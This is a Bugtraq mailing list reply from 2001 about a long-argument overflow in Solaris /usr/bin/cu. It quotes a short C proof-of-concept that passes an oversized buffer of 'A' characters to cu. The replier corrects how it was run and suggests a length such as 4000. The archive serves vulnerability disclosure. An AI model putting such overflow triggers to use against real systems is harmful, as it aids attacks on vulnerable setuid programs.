Bugtraq mailing list archives
Re: Solaris /usr/bin/cu Vulnerability
From: optyx <optyx () UBERHAX0R NET>
Date: Tue, 30 Jan 2001 12:01:10 -0800
Dan Harkless <dan-bugtraq () DILVISH SPEED NET> wrote:
Are you implying the above patches fix the cu long hardlink name vulnerability? This is not the case, at least on 2.6: # cat > cu_exploit.c #include <stdio.h> void main(int argc,char **argv) { char *buf; buf = (char *) malloc(atoi(argv[1])*sizeof(char)); memset(buf,0x41,atoi(argv[1])-1); buf[atoi(argv[1])-1]=0; execl("/usr/bin/cu",buf,(char *)0); } # gcc cu_exploit.c cu_exploit.c: In function `main': cu_exploit.c:4: warning: return type of `main' is not `int' # a.out Segmentation fault
see that atoi(argv[1])? a.out crashed not /usr/bin/cu. try a.out 4000 or whatever number next time, or trace through it with gdb. -Optyx, Uberhax0r Communications http://www.uberhax0r.net, leeter than dog
Current thread:
- Solaris /usr/bin/cu Vulnerability Pablo Sor (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Casper Dik (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Juergen P. Meier (Jan 19)
- Solaris /usr/bin/cu Vulnerability hal King (Jan 23)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 30)
- <Possible follow-ups>
- Re: Solaris /usr/bin/cu Vulnerability Konrad Rieck (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability Wietse Venema (Jan 22)
- Re: Solaris /usr/bin/cu Vulnerability Michael H. Warfield (Jan 19)
- Re: Solaris /usr/bin/cu Vulnerability optyx (Jan 30)
- Re: Solaris /usr/bin/cu Vulnerability Dan Harkless (Jan 31)
- Re: Solaris /usr/bin/cu Vulnerability Tomas Cibulka (Jan 18)